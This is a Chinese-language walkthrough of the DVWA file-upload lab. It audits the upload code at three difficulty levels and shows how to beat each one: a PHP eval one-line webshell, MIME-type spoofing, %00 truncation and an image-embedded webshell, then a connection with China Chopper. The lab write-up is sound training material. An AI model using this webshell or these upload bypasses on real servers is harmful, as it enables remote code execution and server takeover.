LOW:
下列代码只是实现了上传,没有任何的门槛
<?php
if (isset($_POST['Upload'])) { //isset函数的意思判断是否是POST的方式上传的
$target_path = DVWA_WEB_PAGE_TO_ROOT."hackable/uploads/";
$target_path = $target_path . basename( $_FILES['uploaded']['name']);
if(!move_uploaded_file($_FILES['uploaded']['tmp_name'], $target_path)) {
echo '<pre>';
echo 'Your image was not uploaded.';
echo '</pre>';
} else {
echo '<pre>';
echo $target_path . ' succesfully uploaded!';
echo '</pre>';
}
}
?>
写一个PHP的一句话木马
密码是123,另存为1.php
<?php
eval($_POST['123']);
?>
开始上传
上传路径:
http://192.168.5.4/dvwa/hackable/uploads/1.php
使用菜刀链接:
MEDIUM:
审计代码:
下列代码实现了上传文件类型的判断
如果上传文件类型不是图片的不让上传
File Upload Source
<?php
if (isset($_POST['Upload'])) {
$target_path = DVWA_WEB_PAGE_TO_ROOT."hackable/uploads/";
$target_path = $target_path . basename($_FILES['uploaded']['name']);
$uploaded_name = $_FILES['uploaded']['name'];
$uploaded_type = $_FILES['uploaded']['type'];
$uploaded_size = $_FILES['uploaded']['size'];
if (($uploaded_type == "image/jpeg") && ($uploaded_size < 100000)){
if(!move_uploaded_file($_FILES['uploaded']['tmp_name'], $target_path)) {
echo '<pre>';
echo 'Your image was not uploaded.';
echo '</pre>';
} else {
echo '<pre>';
echo $target_path . ' succesfully uploaded!';
echo '</pre>';
}
}
else{
echo '<pre>Your image was not uploaded.</pre>';
}
}
?>
抓包后,改为可以上传的文件类型
然后在发包
上传成功,中等级别主要就是判断文件类型,不管是什么后缀名只要文件类型给他想要的就可以
HIGH:
如图往常一样,代码审计:
高级别脚本对上传文件的后缀名进行判断,也就是我们满足要求的后缀名就可以上传
File Upload Source
<?php
if (isset($_POST['Upload'])) {
$target_path = DVWA_WEB_PAGE_TO_ROOT."hackable/uploads/";
$target_path = $target_path . basename($_FILES['uploaded']['name']);
$uploaded_name = $_FILES['uploaded']['name'];
$uploaded_ext = substr($uploaded_name, strrpos($uploaded_name, '.') + 1);
$uploaded_size = $_FILES['uploaded']['size'];
if (($uploaded_ext == "jpg" || $uploaded_ext == "JPG" || $uploaded_ext == "jpeg" || $uploaded_ext == "JPEG") && ($uploaded_size < 100000)){
if(!move_uploaded_file($_FILES['uploaded']['tmp_name'], $target_path)) {
echo '<pre>';
echo 'Your image was not uploaded.';
echo '</pre>';
} else {
echo '<pre>';
echo $target_path . ' succesfully uploaded!';
echo '</pre>';
}
}
else{
echo '<pre>';
echo 'Your image was not uploaded.';
echo '</pre>';
}
}
?>
两种方法:
第一种,采用%00截断
首先,选择12.php这是我们的木马,我们重命名为12.php.jpg,上传抓包
我们在这里是添加一个00,添加00,添加00,不是把2e改为00
这个%00截断只适合于低版本的PHP,相对于高版本的不适合
上传失败
第二种,采用图片木马
准备一句话木马和一张能打开的照片
使用copy命令
copy 1.jpg/b+1.php/a 1.jpg
得到了一个木马图片1.jpg,开始上传
随后,我们要打开这个图片,让它被解析
http://192.168.5.4/dvwa/hackable/uploads/1.jpg
使用菜刀链接: